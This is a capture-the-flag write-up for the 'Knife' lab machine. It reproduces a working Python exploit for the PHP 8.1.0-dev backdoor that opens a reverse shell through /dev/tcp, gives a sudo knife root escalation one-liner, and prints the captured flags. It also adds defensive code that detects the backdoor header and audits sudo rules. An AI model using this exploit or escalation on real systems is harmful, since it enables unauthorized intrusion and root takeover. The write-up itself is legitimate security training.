Knife

TARGET IP: 10.10.10.242
HOST IP: 10.10.16.3
RECON
WEBSITE
http://[TARGET IP]

The page looks like a typical medical site. The source code has nothing of note except for some JavaScript that handles the styling when the page first loads.
I'll also note that there are no links on this page or in its source code, other than third-party links.

Wappalyzer gives us a lot of good information:
Apache web server v2.4.41
Backend --> PHP v8.1.0 (Wappalyzer doesn't show it here, but the actual version is 8.1.0-dev). This is the route we need to go with.
OS --> Ubuntu
After a quick Google search, it appears that this Apache version has several known vulnerabilities. Metasploit might even have a module to exploit one of them.
From the Gobuster scan below, I found an /index.php page. This is just the same home page.
NMAP
nmap [TARGET IP]

nmap [TARGET IP] -A -p 22,80

We can confirm that the Apache web server is version 2.4.41.
sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80

NIKTO
First time using Nikto here; it's an interesting tool.
nikto 10.10.10.242

This shows that the PHP version in use is 8.1.0-dev.
A quick Google search shows that this is a development version of PHP with a major vulnerability.
ENUMERATION
GOBUSTER
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt

gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt -x php

gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt

EXPLOITATION
Let's dive into possible exploits for the Apache version.
The Apache website has a list of all known vulnerabilities per version, which is really handy.
Nothing sticks out specifically for this version, but it may still be susceptible to multiple attacks.
I'm pretty sure this is not the route to go, but let's take a look.
METASPLOIT
Tried a few of the available exploits, but nothing really stuck.
No luck here with Apache.
PHP
From the Nikto scan I found that the PHP version is 8.1.0-dev, which shipped with a backdoor that allows remote code execution on the server.
I found a really useful Python script that uses this backdoor to get a reverse shell.
#!/usr/bin/env python3
# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.
Usage:
python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
"""
import sys, argparse, requests

request = requests.Session()


def check_target(args):
    # The backdoored build advertises itself in the response headers (e.g. X-Powered-By).
    response = request.get(args.url)
    for header in response.headers.items():
        if "PHP/8.1.0-dev" in header[1]:
            return True
    return False


def reverse_shell(args):
    # The backdoor evaluates the User-Agentt header value that follows the "zerodium" prefix.
    payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'
    injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)


def main():
    parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")
    parser.add_argument("url", metavar='<target URL>', help="Target URL")
    parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)
    parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")
    args = parser.parse_args()
    if check_target(args):
        reverse_shell(args)
    else:
        print("Host is not available or vulnerable, aborting...")
        sys.exit(1)


if __name__ == "__main__":
    main()
I created a new file with the code snippet above and ran the following.
nc -lvnp 4444
python3 exploit.py http://[TARGET IP] [HOST IP] 4444
Return to your netcat listener; you should now have a shell on the system.
Here is the user flag.
58a976dbd2240852f6910cab079cc7df
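From the defender's side, the same two facts the script relies on (the PHP/8.1.0-dev banner in response headers, and the misspelled User-Agentt request header carrying the "zerodium" trigger) are exactly what an inventory check and a detection rule should key on. The following is an added example, not part of the original write-up or of flast101's script; the sample headers and requests in it are constructed for the example.

```python
"""Added example (not from the write-up or the exploit): defender-side checks for the
PHP 8.1.0-dev backdoor.

1. Inventory: does a server's response advertise PHP/8.1.0-dev (the same header check
   the exploit's check_target() performs, turned into an audit)?
2. Detection: does a captured HTTP request carry the non-standard 'User-Agentt' header,
   and does its value start with the backdoor's 'zerodium' trigger?

All sample headers and requests below are constructed for this example.
"""

VULNERABLE_BANNER = "PHP/8.1.0-dev"
TRIGGER_PREFIX = "zerodium"


def advertises_backdoored_php(response_headers: dict) -> bool:
    """True if any response header value (X-Powered-By, Server, ...) names PHP/8.1.0-dev."""
    return any(VULNERABLE_BANNER in value for value in response_headers.values())


def parse_request_headers(raw_request: str) -> dict:
    """Parse the header block of a raw HTTP/1.1 request into a dict.
    Header names are lower-cased so 'User-Agentt' and 'user-agentt' compare equal."""
    headers = {}
    lines = raw_request.split("\r\n")
    for line in lines[1:]:          # skip the request line
        if line == "":
            break                   # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def classify_request(raw_request: str) -> str:
    """'exploit' when the backdoor trigger is present, 'suspicious' when the misspelled
    header appears with any other value (nothing legitimate sends it), else 'clean'."""
    headers = parse_request_headers(raw_request)
    value = headers.get("user-agentt")
    if value is None:
        return "clean"
    if value.lstrip().lower().startswith(TRIGGER_PREFIX):
        return "exploit"
    return "suspicious"


def scan_requests(raw_requests):
    """Classify a batch of captured requests; returns a list of (verdict, request) pairs."""
    return [(classify_request(r), r) for r in raw_requests]


# Constructed samples: a normal browser request, a probe with the odd header, and a trigger.
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
PROBE_REQUEST = "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agentt: test\r\n\r\n"
TRIGGER_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                   "User-Agentt: zerodiumvar_dump(1);\r\n\r\n")

if __name__ == "__main__":
    for verdict, req in scan_requests([BENIGN_REQUEST, PROBE_REQUEST, TRIGGER_REQUEST]):
        print(verdict, "<-", req.split("\r\n")[2])
    print(advertises_backdoored_php({"Server": "Apache/2.4.41 (Ubuntu)",
                                     "X-Powered-By": "PHP/8.1.0-dev"}))
```

One caveat for detection: Apache's default combined LogFormat records User-Agent, not User-Agentt, so an access-log search will miss the trigger entirely. The request-header check above needs either full-request capture (a reverse proxy, WAF or packet capture) or a custom LogFormat that adds `%{User-Agentt}i`. Any occurrence of the misspelled header is worth alerting on, since no legitimate client sends it.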
PRIVILEGE ESCALATION
Start by checking what sudo privileges are allowed.
sudo -l

Let's check GTFOBins for a possible escalation route.
sudo knife exec -E 'exec "/bin/sh"'
cat /root/root.txt
c0a6dfc2f007265b4eafecf32efebab9
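The escalation works because sudo grants knife, a tool whose exec subcommand runs arbitrary Ruby and therefore a shell, as root. The check a defender wants is an audit of `sudo -l` output that flags such entries before anyone else does. Below is an added example, not from the original write-up; the `sudo -l` output it parses is constructed for the example, and SHELL_CAPABLE contains only knife (the binary from the GTFOBins entry above) and is meant to be extended from GTFOBins for a real audit.

```python
"""Added example (not from the write-up): audit 'sudo -l' output for entries that
hand a shell-capable binary to a user as root. Sample output is constructed."""
import re

# Binaries whose sudo entry is known to yield a root shell. Only knife here, taken from
# the GTFOBins entry the write-up uses; extend from GTFOBins for a real audit.
SHELL_CAPABLE = {"knife"}

# One 'sudo -l' entry line looks like: "(runas) TAG: TAG: /path/cmd args, /path/cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str):
    """Return (runas, tags, command) tuples from the 'may run the following commands' section."""
    entries = []
    in_section = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_section = True
            continue
        if not in_section:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):      # one line may list several commands
            entries.append((m.group("runas").strip(), tags, cmd.strip()))
    return entries


def risky_entries(output: str):
    """Flag entries whose command basename is shell-capable and that run as root (or ALL)."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        parts = cmd.split()
        if not parts:
            continue
        binary = parts[0].rsplit("/", 1)[-1]
        runs_as_root = runas.split(":")[0].strip() in ("root", "ALL")
        if binary in SHELL_CAPABLE and runs_as_root:
            findings.append({"runas": runas, "binary": binary, "command": cmd,
                             "nopasswd": "NOPASSWD" in tags})
    return findings


# Constructed 'sudo -l' output; user and host names are placeholders.
SAMPLE_SUDO_L = """Matching Defaults entries for user1 on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user1 may run the following commands on target:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/ls -la /var/log
"""

if __name__ == "__main__":
    for finding in risky_entries(SAMPLE_SUDO_L):
        print("root shell reachable via sudo:", finding)
```

The second constructed entry (ls) is not flagged because only knife is in the list; in practice the list comes from GTFOBins and the remediation is to drop the entry, since restricting knife's arguments in sudoers does not stop its exec subcommand from running code as root.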